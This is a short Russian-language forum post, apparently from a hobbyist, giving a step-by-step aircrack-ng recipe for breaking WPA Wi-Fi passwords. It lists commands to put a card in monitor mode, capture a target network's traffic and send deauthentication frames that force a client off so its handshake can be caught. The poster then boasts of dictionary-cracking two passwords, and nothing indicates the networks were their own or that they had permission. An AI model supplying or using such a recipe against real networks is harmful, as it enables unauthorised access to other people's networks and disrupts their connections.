Попробую передать мой опыт, так скажем первые шаги...

Я делал по такой инструкции:

1. airmon-ng start wlan0

2. airodump-ng mon0

3. airodump-ng -w (name of target) -c (channel) --bssid (target mac address) mon0

4. aireplay-ng wlan0 --deauth 5 -a (mac bssid) -c (mac client) mon0

после этой команды клиент должен отвалится и заново аутонтифицироваться.

после последней команды мониторим ситуацию с хендшейком. я с первой попытки выудил 2 хендшейка подряд. позже наудивление сбрутил пассы один за 10 мин, второй за 2.5 часа работы со штатным словарем с инета, скорость перебора составила в районе 11000 паролей в сек. Все работает, нужно понимачть что делаешь. А не просто копировать.

честно говоря не помню откуда взял словарик но он меня порадовал.